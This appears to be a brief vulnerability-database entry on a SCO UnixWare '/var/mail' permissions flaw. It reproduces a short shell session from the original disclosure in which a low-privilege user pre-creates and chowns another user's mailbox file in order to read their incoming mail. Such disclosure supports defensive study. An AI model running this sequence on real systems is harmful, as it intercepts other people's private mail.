|
|
SCO UnixWare '/var/mail' permissions Vulnerability
bash-2.02$ id uid=106(xnec) gid=1(other) bash-2.02$ pwd /var/mail bash-2.02$ touch btellier bash-2.02$ chown btellier btellier bash-2.02$ ls -la btellier -rw-r--r-- 1 btellier other 0 Dec 4 07:54 btellier Now wait for btellier to get some mail... [This exploit is part of the original mail on this subject posted by Brock Tellier, it is listed in its entirety in the 'Credit' section of this vulnerability entry.] |
|
Privacy Statement |